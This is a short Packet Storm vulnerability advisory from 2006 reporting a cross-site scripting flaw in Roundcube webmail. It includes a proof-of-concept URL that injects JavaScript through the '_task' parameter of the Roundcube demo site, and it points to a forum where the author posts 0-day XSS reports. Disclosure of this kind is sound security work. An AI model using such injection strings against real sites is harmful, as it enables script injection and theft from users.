roundcube-XSS.txt

2006-11-14T00:00:00
ID PACKETSTORM:52016
Type packetstorm
Reporter RSnake
Modified 2006-11-14T00:00:00

Description

                                        
                                            `There is an XSS vulnerability in roundcube webmail:  
  
http://demo.roundcube.net/?_task=');alert(%22XSS%22)//  
  
Btw, we've been posting 0-day XSS vulnerabilities at   
http://sla.ckers.org/forum/list.php?3 to take it out of the full   
disclosure list since lots of people don't want to see the sheer volume   
of reports. We've got close to a thousand companies and counting.   
We're just trying to cut down on the noise to people's inboxes. That is   
all.  
  
-RSnake  
http://ha.ckers.org  
http://sla.ckers.org  
  
`